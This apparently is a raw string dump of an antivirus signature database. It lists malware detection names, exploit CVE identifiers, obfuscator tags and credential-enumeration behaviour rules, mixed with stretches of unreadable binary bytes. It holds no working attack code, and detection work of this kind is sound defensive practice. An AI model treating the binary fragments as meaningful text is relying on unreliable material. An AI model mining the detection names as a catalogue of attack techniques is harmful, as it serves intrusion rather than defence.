*!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA2D *!#ALF:HeraklezEval:Exploit:Linux/Woffled.A *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AB30 /b;>? *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA81 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA8E *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AB41 *!#ALF:HeraklezEval:TrojanWin32/Ymacco.AA1E =\"V^D :El<# h:El<#ik ;Rr? ;Rr? q \"]s?% > )+@ ?\t2Pk#e? 7Jl?S? ;<|(r> .`1> ww?%S T.`1> b2x>< >%pqC ?\"&'< -0n}@< .; *> /V>\tJ `.`1> >\"ckVX:> ?\t !zyi> &'Bd> >&HI% WYp?#> H$>%Z ? tu^ p9?\"35@q GUl?S? vr>\t\\ {V0?$ {V0?$] Q?#ef F12? F12? <!-B1@ CAR?\"D 0O3x> .l?S? >%1hC= >\t3]k#e? !,> 7 BNl?S? Q\\AR? #>&YZ g?%`e >!ot$l O3x>& 6O3x>& |1 ? |1 ? _.&=& s?%$' >%WaC= 'Bd>! m&? e B?$jk >&CYo9 !#SLF:Context/DocAttachCmdFileWithSchtasks.A !#SLF:Context/DocAttachLnkFileWithCertutil.A !#SLF:Context/DocAttachLnkFileWithSchtasks.A !#SLF:Context/DocAttachPifFileWithCertutil.A !#SLF:Context/DocAttachPifFileWithSchtasks.A !#ALF:XL4SuspOper.B !#AGGR:SingleAchiveFileInAchive !#TEL:Trojan:HTML/Redirector.CS!MTB !#ALF:Exploit:O97M/CVE-2017-11882.APW!MTB !#ALF:Trojan:O97M/MacroAPI.C !#TEL:Exploit:JS/CVE-2015-1641 !#ALF:TrojanDownloader:VBS/BITSAbuse.R!MTB !#AGG:AllowList:Win32/Vemotion.VB3xViewer.A !#SLF:Context/DocAttachBatFileWithBitsadmin.A !#SLF:Context/DocAttachCmdFileWithBitsadmin.A !#SLF:Context/DocAttachLnkFileWithBitsadmin.A !#SLF:Context/DocAttachPifFileWithBitsadmin.A !#SLF:AGGR:O97M/ObfShellLaunch.A!amsi !#ALF:TrojanDownloader:O97M/EncDoc.AJAC!MTB !#ALF:TrojanDownloader:O97M/EncDoc.IDTJ!MTB !#ALF:TrojanDownloader:O97M/EncDoc.IIAE!MTB !#ALF:TrojanDownloader:O97M/EncDoc.TEFT!MTB !#ALF:TrojanDownloader:O97M/EncDoc.XFCD!MTB !#ALF:TrojanDownloader:O97M/Qakbot.IHAO!MTB !#ALF:Trojan/PSDynamicAssembly.B1 !#TEL:TrojanDownloader:O97M/EncDoc.ACT!MTB !#ALF:HackTool:PowerShell/AADInternalsPSD1.A!MTB !#AGG:AllowList:Win32/GreenTreeApps.DLPDFEditor.A !#ALF:TrojanDownloader:VBS/Obfuse.XGPS!MTB !#AGG:O97M/EncDoc.PSW !#AGGR:Context/LolbinProcess.B !#AGG:AllowList:Win32/Google.Update.A !#TEL:TrojanDownloader:O97M/EncDoc.DRQ!MTB !#ALF:CloudShell.A !#TEL:TrojanDownloader:PowerShell/Emotet.DEO!MTB !#ALF:Phish:PHP/FreakzBrothers_PKT_VT!MTB !#Trojan:Win32/Ursnif.DL!MTB txj11 !#AGG:AllowList:Win32/KoreaCyberPayment.A !#TEL:TrojanDownloader:PowerShell/MMiner.A!MSR !#//MLJsOtherFilter !#EccRootPubKey3rdPartyInScriptSig !#SLF:SuspSpoolsvProcessDrop.C!dll !#ALF:Backdoor:PHP/Ensikology_Wshl!MTB !#SLF:Win32/PossibleMasquerading.EA!hh.exe !#SLF:Win32/PossibleMasquerading.gen!A!lolbindll !#SLF:Win32/PossibleMasquerading.gen!A!lolbinexe !#AGGR:TopLevelFileExt!xlsx !#ALF:Phish:PHP/MS_Login_Outlook_PKT!MTB !#AGGR:SuspAmsiWmiPropName.A !#ALF:Trojan:UEFI/EfiGuardDxe.B !#AGG:AllowList:Win32/Computrace.A !#TEL:TrojanDownloader:JS/Nemucod.QK !#SLF:Win32/PossibleMasquerading.EA!wmic.exe !#ALF:TrojanDownloader:O97M/Powdow.SX!MTB !#ALF:TrojanDownloader:O97M/TrickBot.PXY!MTB !#ALF:TrojanDownloader:VBS/Donvibs.PRCSX!MTB !#ALF:Phish:PHP/Phish_6610578!MTB !#TEL:Trojan:Win32/AggBITSAbuse.C !#TEL:Trojan:Win32/Ursnif.DLL!MTB !#SLF:AGGR:CopyRenamed!installutil.exe !#TEL:TrojanDownloader:O97M/Emotet.OMES!MTB !#SLF:Context/DocAttachBatFileWithMsWorkflowCompiler.A BM_DLM_FILE BM_SQLlite_FILE BM_WMF_FILE BM_PNF_FILE BM_JDIFF_FILE BM_JAVA_CLASS_FILE BM_MACHO32_FILE BM_MACHO64_FILE BM_XAR_ARCHIVE_FILE BM_ZLIB_FILE BM_ELF_FILE BM_LHA_FILE BM_SDB_FILE BM_CLFS_FILE BM_BIN_PLIST_FILE BM_DMG_FILE BM_DLM_FILEBM_SQLlite_FILEBM_WMF_FILEBM_PNF_FILEBM_JDIFF_FILEBM_JAVA_CLASS_FILEBM_MACHO32_FILEBM_MACHO64_FILEBM_XAR_ARCHIVE_FILEBM_ZLIB_FILEBM_ELF_FILEBM_LHA_FILEBM_SDB_FILEBM_CLFS_FILEBM_BIN_PLIST_FILEBM_DMG_FILEBM_UNKNOWN_FILEsvchost.exeMpDisableMOACSyncInsert, scan_FileTyper !FileTyper scan_FileTyper!FileTyper h0 #- \"#$%&'()*+,-./0123459:;>?CDHIJKLNTUVWXYZ[ @ABMO !678PQEF %\t %\t %\t X %\t %\t %\t X %\t %\t 9 X %\t 9 %\t %\t! %\t = X %\t %\t %\t %\t jYInZ XjX\tT+$ HjXLXJn 8jXLX jXJD* 8jXL9 PjXLX PjXL\tXI PjXL\tX jXJ(& _b\tG`R jXJnY (jXJ: PjXL9| XjXJ9q (jXJ:L @jXJ pppppppp 1jXG- PjXL9 XjXJ9 |g@>; k$Z51 J` 8p J` 8R J` 8v J` +e J` +T 5h.V+R X |@* (jXJ4B+ ]#LowFi:BMLua:AccessibilityEscalation.D!narrator ]#LowFi:BMLua:AccessibilityEscalation.D!narratorU5d Y#PERSIST:LowFi:HSTR:Backdoor:Win64/Shoive.D!dha Y#PERSIST:LowFi:HSTR:Backdoor:Win64/Shoive.D!dhaU5 Y#PERSIST:HSTR:Exploit:Win32/DouglasIISToken!dha Y#PERSIST:HSTR:Exploit:Win32/DouglasIISToken!dhaU5i :#LowFi:AGGREGATOR:MonitoringTool:Win32/PowerSpy :#LowFi:AGGREGATOR:MonitoringTool:Win32/PowerSpyU5 Y#PERSIST:HSTR:VirTool:MSIL/Obfuscator.Dotwall.A Y#PERSIST:HSTR:VirTool:MSIL/Obfuscator.Dotwall.AU5G ]#LowFi:BMLua:AccessibilityEscalation.U!atbroker ]#LowFi:BMLua:AccessibilityEscalation.U!atbrokerU5 :#Lowfi:HSTR:BrowserModifier:Win32/AOLToolbarCby :#Lowfi:HSTR:BrowserModifier:Win32/AOLToolbarCbyU5@ Y#PERSIST:SIGATTR:Trojan:Win32/Seadask.gen.A!dha Y#PERSIST:SIGATTR:Trojan:Win32/Seadask.gen.A!dhaU5 ]#LowFi:BMLua:AccessibilityEscalation.S!atbroker ]#LowFi:BMLua:AccessibilityEscalation.S!atbrokerU5z :#Lowfi:SIGATTR:Exploit:Java/CVE-2013-1493.INIT2 :#Lowfi:SIGATTR:Exploit:Java/CVE-2013-1493.INIT2U5k :#LowFi:SCPT:Exploit:VBS/CVE-2014-6332_SunDown.1 :#LowFi:SCPT:Exploit:VBS/CVE-2014-6332_SunDown.1U5 :#Lowfi:HSTR:VirTool:Win32/Obfuscator!Diplugem.H :#Lowfi:HSTR:VirTool:Win32/Obfuscator!Diplugem.HU5 )#:1:b:2:NSIS_3_0_strlen_bzip2_solid-x86-unicode )#:1:b:2:NSIS_3_0_strlen_bzip2_solid-x86-unicodeU5`7i ]#LowFi:BMLua:AccessibilityEscalation.Z!narrator ]#LowFi:BMLua:AccessibilityEscalation.Z!narratorU5 :#Lowfi:HSTR:VirTool:Win32/Obfuscator!Diplugem.D :#Lowfi:HSTR:VirTool:Win32/Obfuscator!Diplugem.DU5C :#Lowfi:HSTR:TrojanDownloader:Win32/Nokoag.A!dha :#Lowfi:HSTR:TrojanDownloader:Win32/Nokoag.A!dhaU6~1; Y#PERSIST:LowFi:HSTR:Trojan:Win32/Boracefig.A!dha Y#PERSIST:LowFi:HSTR:Trojan:Win32/Boracefig.A!dhaU6 \t:#Lowfi:HSTR:TrojanDownloader:O97M/Donoff.gen!D.1 \t:#Lowfi:HSTR:TrojanDownloader:O97M/Donoff.gen!D.1U6 ]#Lowfi:Lua:Trojan:Win32/MsWinHostsPatchDropper.A ]#Lowfi:Lua:Trojan:Win32/MsWinHostsPatchDropper.AU6^fd :#Lowfi:SIGATTR:TrojanDownloader:Win32/Tenomils.A :#Lowfi:SIGATTR:TrojanDownloader:Win32/Tenomils.AU6 :#Lowfi:HSTR:TrojanDownloader.Miruotaa.Decryption :#Lowfi:HSTR:TrojanDownloader.Miruotaa.DecryptionU6 Y#PERSIST:AGGR:TrojanDownloader:O97M/Donoff.gen!A Y#PERSIST:AGGR:TrojanDownloader:O97M/Donoff.gen!AU6 :#Lowfi:Lua:WrittenToDownloadFolder1SubByExplorer :#Lowfi:Lua:WrittenToDownloadFolder1SubByExplorerU6 Y#PERSIST:HSTR:VirTool:MSIL/Obfuscator.Codewall.A Y#PERSIST:HSTR:VirTool:MSIL/Obfuscator.Codewall.AU6 :#Lowfi:SIGA:MSIL/Suspicious.ProfilerDetection.S2 :#Lowfi:SIGA:MSIL/Suspicious.ProfilerDetection.S2U6 !#TEL:TrojanDropper:Powershell/CryptoDrop.VH!MSR !#TEL:TrojanDropper:Powershell/CryptoDrop.VH!MSRU6 FZ#]#LowFi:SCRIPT:Worm:JS/Bondat.A!LnkTargetJs_lowfi FZ#]#LowFi:SCRIPT:Worm:JS/Bondat.A!LnkTargetJs_lowfiU6 b,:#Lowfi:AGGREGATOR:REG/DisallowedCert_Bitdefender b,:#Lowfi:AGGREGATOR:REG/DisallowedCert_BitdefenderU6IF -Y#PERSIST:Behavior:Win32/AptCampaignDoubleTap!dha -Y#PERSIST:Behavior:Win32/AptCampaignDoubleTap!dhaU6 -:#Lowfi:Lua:VbaProjectWrittenToDownloadFolder1Sub -:#Lowfi:Lua:VbaProjectWrittenToDownloadFolder1SubU6 v2:#Lowfi:AGGREGATOR:REG/DisallowedCert_ThreatTrack v2:#Lowfi:AGGREGATOR:REG/DisallowedCert_ThreatTrackU6+ 4:#Lowfi:SCRIPT:TrojanDownloader:PowerShell/Guidar 4:#Lowfi:SCRIPT:TrojanDownloader:PowerShell/GuidarU63{ 8:#Lowfi:SIGATTR:AutoHotkeyResourceScriptZIPHeader 8:#Lowfi:SIGATTR:AutoHotkeyResourceScriptZIPHeaderU6 9:#LowFi:Adware:MSIL/SanctionedMedia!LikeyCleanPUS 9:#LowFi:Adware:MSIL/SanctionedMedia!LikeyCleanPUSU6 <Y#PERSIST:HSTR:Adware:Win32/Obfuscator!ZoomyLib.A <Y#PERSIST:HSTR:Adware:Win32/Obfuscator!ZoomyLib.AU6 tC:#Lowfi:Lua:WrittenToDesktopFolderByWindowsBinary tC:#Lowfi:Lua:WrittenToDesktopFolderByWindowsBinaryU6h D:#LowFiHSTR:Program:Win32/CoinMiner_Ufasoft_Clean D:#LowFiHSTR:Program:Win32/CoinMiner_Ufasoft_CleanU6 LY#PERSIST:LowFi:SCRIPT:Exploit:SWF/FunkMaster!dha LY#PERSIST:LowFi:SCRIPT:Exploit:SWF/FunkMaster!dhaU6) #MN#SYNCLOWFI:HSTR:TrojanClicker:Win64/Fleercivet.B #MN#SYNCLOWFI:HSTR:TrojanClicker:Win64/Fleercivet.BU6v\" \\:#LowFiExp:Win32/ContextualModJavaTempLikeCorrupt \\:#LowFiExp:Win32/ContextualModJavaTempLikeCorruptU6 `:#Lowfi:Lua:WrittenToDownloadFolder1SubByArchiver `:#Lowfi:Lua:WrittenToDownloadFolder1SubByArchiverU6 \th:#Lowfi:HSTR:TrojanSefnit_TorComponent_Obfuscator \th:#Lowfi:HSTR:TrojanSefnit_TorComponent_ObfuscatorU6 hY#PERSIST:LowFi:MonitoringTool:Win32/NDiskPro!dha hY#PERSIST:LowFi:MonitoringTool:Win32/NDiskPro!dhaU6 i:#Lowfi:VirTool:Win64/Obfuscator.ADB_Reveton_aggr i:#Lowfi:VirTool:Win64/Obfuscator.ADB_Reveton_aggrU6> i:#LowFi:FOP:VirTool:Win32/Obfuscator.ANC_lowfi_ep i:#LowFi:FOP:VirTool:Win32/Obfuscator.ANC_lowfi_epU6D #j:#Lowfi:RPF:VirTool:Win32/Obfuscator.ACV.NOISELOD #j:#Lowfi:RPF:VirTool:Win32/Obfuscator.ACV.NOISELODU6\" yv)#:1:b:2:NSIS_3_02_strlen_bzip2_solid-x86-unicode yv)#:1:b:2:NSIS_3_02_strlen_bzip2_solid-x86-unicodeU6+ ]#LowFi:SCRIPT:Worm:JS/Bondat.B!LnkTargetJs_lowfi ]#LowFi:SCRIPT:Worm:JS/Bondat.B!LnkTargetJs_lowfiU6xs% Y#PERSIST:Behavior:Win32/AptCampaignInception!dha Y#PERSIST:Behavior:Win32/AptCampaignInception!dhaU6 :#Lowfi:SCRIPT:TrojanDownloader:PowerShell/Drixed :#Lowfi:SCRIPT:TrojanDownloader:PowerShell/DrixedU6 :#Lowfi:SIGATTR:Virtool:Win32/RegSecFilesDisabler :#Lowfi:SIGATTR:Virtool:Win32/RegSecFilesDisablerU66H :#Lowfi:HSTR:TrojanDownloader:O97M/Donoff.gen!D.2 :#Lowfi:HSTR:TrojanDownloader:O97M/Donoff.gen!D.2U6SgZ :#LowFiHSTR:Program:Win32/CoinMiner_CGMiner_Clean :#LowFiHSTR:Program:Win32/CoinMiner_CGMiner_CleanU6 Y#PERSIST:Behavior:Win32/AptCampaignSWCAttack!dha Y#PERSIST:Behavior:Win32/AptCampaignSWCAttack!dhaU6 Y#PERSIST_SIGATTR:SoftwareBundler:Win32/Amonetize Y#PERSIST_SIGATTR:SoftwareBundler:Win32/AmonetizeU6p/K Y#PERSIST:TrojanDownloader:Win32/EqtonFanys.A!dha Y#PERSIST:TrojanDownloader:Win32/EqtonFanys.A!dhaU6 )#:1:b:2:NSIS_3_01_strlen_bzip2_solid-x86-unicode )#:1:b:2:NSIS_3_01_strlen_bzip2_solid-x86-unicodeU6H :#Lowfi:SIGATTR:TrojanDownloader:Win32/Tembatch.B :#Lowfi:SIGATTR:TrojanDownloader:Win32/Tembatch.BU6G{ Y#PERSIST:SCRIPT:BrowserModifier:Win32/Wolerngi.A Y#PERSIST:SCRIPT:BrowserModifier:Win32/Wolerngi.AU6w :#LowFi:Adware:Win32/ShopperReports!LikeyCleanPUS :#LowFi:Adware:Win32/ShopperReports!LikeyCleanPUSU6qT[ Y#PERSIST:SIGATTR:Adware:Win32/ElexTechYacNSIS.A1 Y#PERSIST:SIGATTR:Adware:Win32/ElexTechYacNSIS.A1U6 :#Lowfi:SIGATTR:TrojanDropper:Win32/DelfInt.A!dha :#Lowfi:SIGATTR:TrojanDropper:Win32/DelfInt.A!dhaU6y :#LowFiExp:Win32/ContextualAccessJavawTempCorrupt :#LowFiExp:Win32/ContextualAccessJavawTempCorruptU6 ]#Lowfi:Rep:CMD:Trojan:Win32/TrapsDoubleExtension ]#Lowfi:Rep:CMD:Trojan:Win32/TrapsDoubleExtensionU6 :#Lowfi:SIGATTR:VirTool:Win32/Obfuscator_Deadbyte :#Lowfi:SIGATTR:VirTool:Win32/Obfuscator_DeadbyteU64 Y#PERSIST:AGGR:Program:Win32/NSISChecksDeepFreeze Y#PERSIST:AGGR:Program:Win32/NSISChecksDeepFreezeU6 :#Lowfi:MSILFOP:MSIL/Obfuscator.GenDecnryptAlgo.O :#Lowfi:MSILFOP:MSIL/Obfuscator.GenDecnryptAlgo.OU7 :#Lowfi:Lua:WrittenToDesktopFolderWithLongFileName :#Lowfi:Lua:WrittenToDesktopFolderWithLongFileNameU7v K Y#PERSIST:HSTR:SoftwareBundler:Win32/Ogimant.gen!B K Y#PERSIST:HSTR:SoftwareBundler:Win32/Ogimant.gen!BU7 Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.B Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.BU7 Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.F Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.FU7zB :#Lowfi:SIGATTR:TrojanDownloader:Win32/Reiramiao.A :#Lowfi:SIGATTR:TrojanDownloader:Win32/Reiramiao.AU7 ']#Lowfi:Behavior:Win32/GDad_DroppedSgsetting.A!dha ']#Lowfi:Behavior:Win32/GDad_DroppedSgsetting.A!dhaU7 h8:#LowFiExp:Win32/ContextualModJavawTempLikeCorrupt h8:#LowFiExp:Win32/ContextualModJavawTempLikeCorruptU7Y N:#Lowfi:SoftwareBundler:Win32/Amonetize!encryption N:#Lowfi:SoftwareBundler:Win32/Amonetize!encryptionU7 2O:#Lowfi:MSILFOP:MSIL/Obfuscator.GenDecnryptAlgo.S1 2O:#Lowfi:MSILFOP:MSIL/Obfuscator.GenDecnryptAlgo.S1U7 U:#Lowfi:AGGREGATOR:REG/DisallowedCert_Malwarebytes [gIcY#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.G U:#Lowfi:AGGREGATOR:REG/DisallowedCert_MalwarebytesU7[gIcY#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.GU7B $dY#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.C $dY#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.CU7 f)#:1:z:2:NSIS_3_0_b2_strlen_zlib_solid-x86-unicode f)#:1:z:2:NSIS_3_0_b2_strlen_zlib_solid-x86-unicodeU7 Y#PERSIST:LowFi:HSTR:VirTool:Win32/Injector.gen!EE Y#PERSIST:LowFi:HSTR:VirTool:Win32/Injector.gen!EEU7\\J Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.I Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.IU7w Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.E Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.EU7 :#Lowfi:SoftwareBundler:Win32/OutBrowse!partialrcb :#Lowfi:SoftwareBundler:Win32/OutBrowse!partialrcbU7yS@ :#Lowfi:HSTR:Adware:Win32/Lollipop_stringobfuscate :#Lowfi:HSTR:Adware:Win32/Lollipop_stringobfuscateU7= Y#PERSIST:SIGATTR:TrojanDownloader:MSIL/Lorozoad.A Y#PERSIST:SIGATTR:TrojanDownloader:MSIL/Lorozoad.AU7 Y#PERSIST:SIGATTR:Program:Win32/CrossRiderError.A1 Y#PERSIST:SIGATTR:Program:Win32/CrossRiderError.A1U7- Y#PERSIST:HSTR:VirTool:MSIL/Compressor.netshrink.A Y#PERSIST:HSTR:VirTool:MSIL/Compressor.netshrink.AU7 :#Lowfi:SIGATTR:TrojanDownloader:Win32/Banload.AZQ :#Lowfi:SIGATTR:TrojanDownloader:Win32/Banload.AZQU7A :#LowFiExp:Win32/ContextualDropJavaTempLikeCorrupt :#LowFiExp:Win32/ContextualDropJavaTempLikeCorruptU7k :#Lowfi:SIGATTR:VirTool:Win32/CeeInject.gen!KK_enc :#Lowfi:SIGATTR:VirTool:Win32/CeeInject.gen!KK_encU7 )#:1:l:2:NSIS_3_0_b2_strlen_lzma_solid-x86-unicode )#:1:l:2:NSIS_3_0_b2_strlen_lzma_solid-x86-unicodeU7 Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.H Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.HU7 :#Lowfi:Lua:WrittenToDownloadFolderByWindowsBinary :#Lowfi:Lua:WrittenToDownloadFolderByWindowsBinaryU7 Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.D Y#PERSIST:HSTR:VirTool:Win32/Obfuscator!Diplugem.DU8 ]#LowFi:Behavior:Win32/OfficeProcMsiexecAbuse.A!tel ]#LowFi:Behavior:Win32/OfficeProcMsiexecAbuse.A!telU8 :#Lowfi:AGGR:TrojanDownloader:Win32/Upatre!unpacked :#Lowfi:AGGR:TrojanDownloader:Win32/Upatre!unpackedU8^fd Y#PERSIST:SIGATTR:TrojanDownloader:Win32/Tenomils.A Y#PERSIST:SIGATTR:TrojanDownloader:Win32/Tenomils.AU8 :#LowFiExp:Win32/ContextualDrop2JavaTempLikeCorrupt :#LowFiExp:Win32/ContextualDrop2JavaTempLikeCorruptU8 Y#PERSIST:Lowfi:PEBMPAT:Simda:AntiEmuTimeStampCheck p7s$:#Lowfi:SIGATTR:Exploit.HalDispatchTableOverwrite.A Y#PERSIST:Lowfi:PEBMPAT:Simda:AntiEmuTimeStampCheckU8p7s$:#Lowfi:SIGATTR:Exploit.HalDispatchTableOverwrite.AU8 =BE:#Lowfi:HSTR:Backdoor:Win32/NetWiredRC.B_trojanized =BE:#Lowfi:HSTR:Backdoor:Win32/NetWiredRC.B_trojanizedU8 S:#Lowfi:SCPT:Exploit:HTML/Long_Hidden_Title_Heading S:#Lowfi:SCPT:Exploit:HTML/Long_Hidden_Title_HeadingU8 l:#Lowfi:SCPT:Exploit:HTML/NeutrinoEK.possible.lowfi l:#Lowfi:SCPT:Exploit:HTML/NeutrinoEK.possible.lowfiU8 :#LowFiExp:Win32/ContextualDropJavawTempLikeCorrupt :#LowFiExp:Win32/ContextualDropJavawTempLikeCorruptU8x :#Lowfi:AGGREGATOR:HasKnownAdwareDomain_NsisBundler :#Lowfi:AGGREGATOR:HasKnownAdwareDomain_NsisBundlerU8h :#Lowfi:Lua:WrittenToDownloadFolderWithLongFileName :#Lowfi:Lua:WrittenToDownloadFolderWithLongFileNameU8 :#LowFi:SIGATTR:Upatre!antiemu_vdll_max8_noseccheck :#LowFi:SIGATTR:Upatre!antiemu_vdll_max8_noseccheckU8 :#LowFi:SNID:BrowserModifier:Win32/Diplugem!ImpHash :#LowFi:SNID:BrowserModifier:Win32/Diplugem!ImpHashU8 :#Lowfi:MACRO:TrojanDownloader:O97/Adnel_decryption :#Lowfi:MACRO:TrojanDownloader:O97/Adnel_decryptionU8 :#Lowfi:SCPT:Trojan:Win32/Kilim_KillChromeAndUpdate :#Lowfi:SCPT:Trojan:Win32/Kilim_KillChromeAndUpdateU8 Y#PERSIST:LowFi:SigAttr:Backdoor:Win64/Shoive.C!dha Y#PERSIST:LowFi:SigAttr:Backdoor:Win64/Shoive.C!dhaU8 N#Lowfi:PEBMPAT:TrojanDownloader:Win32/Upatre!LoD.1 N#Lowfi:PEBMPAT:TrojanDownloader:Win32/Upatre!LoD.1U8 )#:1:b:2:NSIS_3_0_b2_strlen_bzip2_solid-x86-unicode )#:1:b:2:NSIS_3_0_b2_strlen_bzip2_solid-x86-unicodeU8@ :#LowFi:HSTR:BrowserModifier:IEPluginBypass.B!Kipod :#LowFi:HSTR:BrowserModifier:IEPluginBypass.B!KipodU8 Y#PERSIST:HSTR:SoftwareBundler:Win32/OfferInstaller Y#PERSIST:HSTR:SoftwareBundler:Win32/OfferInstallerU8da :#LowFi:SoftwareBundler:Win32/DealPly!LikeyCleanPUS :#LowFi:SoftwareBundler:Win32/DealPly!LikeyCleanPUSU9 :#LowFiExp:Win32/ContextualAccessJavaTempLikeCorrupt :#LowFiExp:Win32/ContextualAccessJavaTempLikeCorruptU9 *\t]!#LowFi:AGGR:Trojan:PowerShell/PSExploitShellCode.A *\t]!#LowFi:AGGR:Trojan:PowerShell/PSExploitShellCode.AU9l :\tY#PERSIST:Behavior:Win32/AptCampaignDesertFalcon!dha :\tY#PERSIST:Behavior:Win32/AptCampaignDesertFalcon!dhaU9G Y#PERSIST:SIGATTR:Program:Win32/CrossRiderWebInst.A1 Y#PERSIST:SIGATTR:Program:Win32/CrossRiderWebInst.A1U9 s :#Exploit:Win32/Crosspoint.IEWordSandboxEscape!Lowfi s :#Exploit:Win32/Crosspoint.IEWordSandboxEscape!LowfiU9Q !:#Lowfi:SCPT:Exploit:HTML/Flash_Long_Ascii_One_Pixel !:#Lowfi:SCPT:Exploit:HTML/Flash_Long_Ascii_One_PixelU9 -#:#Lowfi:HSTR:WhiteListCloud:TrojanDownloader:Vintall JMl;:#Lowfi:SCRIPT:Exploit:HTML/DemocracySurveilIframe.B -#:#Lowfi:HSTR:WhiteListCloud:TrojanDownloader:VintallU9JMl;:#Lowfi:SCRIPT:Exploit:HTML/DemocracySurveilIframe.BU9 P(E]#LowFi:Behavior:Win32/SuspCredEnumerateAttempt.B!cl >>;F:#Lowfi:SCRIPT:Exploit:SWF/CVE-2015-5119.ToByteArray P(E]#LowFi:Behavior:Win32/SuspCredEnumerateAttempt.B!clU9>>;F:#Lowfi:SCRIPT:Exploit:SWF/CVE-2015-5119.ToByteArrayU9 WN#LowFi:Behavior:Win32/SuspCredEnumerateAttempt.A!cl WN#LowFi:Behavior:Win32/SuspCredEnumerateAttempt.A!clU9 W]#LowFi:Behavior:Win32/SuspCredEnumerateAttempt.A!cl W]#LowFi:Behavior:Win32/SuspCredEnumerateAttempt.A!clU9 %b:#Lowfi:HSTR:MSIL/Obfuscator.SmartAssembly.Eva.Ver.B %b:#Lowfi:HSTR:MSIL/Obfuscator.SmartAssembly.Eva.Ver.BU9 t:#Lowfi:HSTR:VirTool:Win32/Obfuscator.ADB_EP2!_lowfi t:#Lowfi:HSTR:VirTool:Win32/Obfuscator.ADB_EP2!_lowfiU9AA# ]!#LowFi:AGGR:Trojan:PowerShell/PSExploitShellCode.B ]!#LowFi:AGGR:Trojan:PowerShell/PSExploitShellCode.BU9 :#Lowfi:SCRIPT:Exploit:HTML/DemocracySurveilIframe.A :#Lowfi:SCRIPT:Exploit:HTML/DemocracySurveilIframe.AU9# :#Lowfi:LUA_VirTool:Win32/Obfuscator.ACV_overlaysize :#Lowfi:LUA_VirTool:Win32/Obfuscator.ACV_overlaysizeU9 :#Lowfi:HSTR:TrojanDownloader:MSIL/ChickenKiller.com :#Lowfi:HSTR:TrojanDownloader:MSIL/ChickenKiller.comU9 :#Lowfi:Lua:WrittenToDesktopSubfolderByWindowsBinary :#Lowfi:Lua:WrittenToDesktopSubfolderByWindowsBinaryU9J N#Lowfi:Lua:SuspiciousExeFileLocationInProgramData.A N#Lowfi:Lua:SuspiciousExeFileLocationInProgramData.AU9 :#LowFiExp:Win32/ContextualDrop2JavawTempLikeCorrupt :#LowFiExp:Win32/ContextualDrop2JavawTempLikeCorruptU9 ]!#LowFi:AGGR:Trojan:PowerShell/PSExploitShellCode.C ]!#LowFi:AGGR:Trojan:PowerShell/PSExploitShellCode.CU9 :#Lowfi:HSTR:TrojanDownloader:MSIL/Bladabindi.Gulfup :#Lowfi:HSTR:TrojanDownloader:MSIL/Bladabindi.GulfupU9 Y#Lowfi:HSTR:TrojanDownloader:MSIL/Bladabindi.Gulfup Y#Lowfi:HSTR:TrojanDownloader:MSIL/Bladabindi.GulfupU9 :#Lowfi:HSTR:TrojanDownloader.Upatre.FunctionAddress :#Lowfi:HSTR:TrojanDownloader.Upatre.FunctionAddressU9 :#Lowfi:HSTR:MSIL/Obfuscator.SmartAssembly.Eva.Ver.A :#Lowfi:HSTR:MSIL/Obfuscator.SmartAssembly.Eva.Ver.AU: Y#PERSIST:HSTR:SoftwareBundler:Win32/OgimantMailRU.A1 Y#PERSIST:HSTR:SoftwareBundler:Win32/OgimantMailRU.A1U: Y#PERSIST:SCPT:Program:Win32/SuperFishz.A1-CrossRider Y#PERSIST:SCPT:Program:Win32/SuperFishz.A1-CrossRiderU: S:#Lowfi:AGGREGATOR:REG/DisallowedCert_ESSDistribution S:#Lowfi:AGGREGATOR:REG/DisallowedCert_ESSDistributionU: c]#LowFi:BMLua:AccessibilityEscalation.Z!displayswitch c]#LowFi:BMLua:AccessibilityEscalation.Z!displayswitchU: X8v:#LowFiExp:Win32/ContextualAccessJavawTempLikeCorrupt X8v:#LowFiExp:Win32/ContextualAccessJavawTempLikeCorruptU:M xY#PERSIST:HSTR:VirTool:MSIL/Obfuscator.RunPE.DzkiLLeR xY#PERSIST:HSTR:VirTool:MSIL/Obfuscator.RunPE.DzkiLLeRU: N\\{N#Lowfi:Lua:SuspiciousExeFileInAppdataWindowsupdate.A N\\{N#Lowfi:Lua:SuspiciousExeFileInAppdataWindowsupdate.AU:dv Y#PERSIST:SCPT:Program:Win32/SuperFishz.A2-CrossRider Y#PERSIST:SCPT:Program:Win32/SuperFishz.A2-CrossRiderU: :#Lowfi:SIGATTR:Worm:Win32/PossibleSillyShareCopy.gen :#Lowfi:SIGATTR:Worm:Win32/PossibleSillyShareCopy.genU:T :#Lowfi:HSTR:SoftwareBundler:Win32/InstallMonetizer.A :#Lowfi:HSTR:SoftwareBundler:Win32/InstallMonetizer.AU: Y#PERSIST:SNID:BrowserModifier:Win32/Diplugem!ImpHash Y#PERSIST:SNID:BrowserModifier:Win32/Diplugem!ImpHashU: :#Lowfi:HSTR:VirTool:Win64/Obfuscator.ADB_Reveton_str :#Lowfi:HSTR:VirTool:Win64/Obfuscator.ADB_Reveton_strU: N#Lowfi:Lua:SuspiciousExeFileLocationInLocalAppdata.A N#Lowfi:Lua:SuspiciousExeFileLocationInLocalAppdata.AU: Y#PERSIST:HSTR:Exploit:Win32/DouglasDojibMS10-048!dha Y#PERSIST:HSTR:Exploit:Win32/DouglasDojibMS10-048!dhaU: N#LowFi:Win32/Generic!PeAttributesSigattrIdContextual 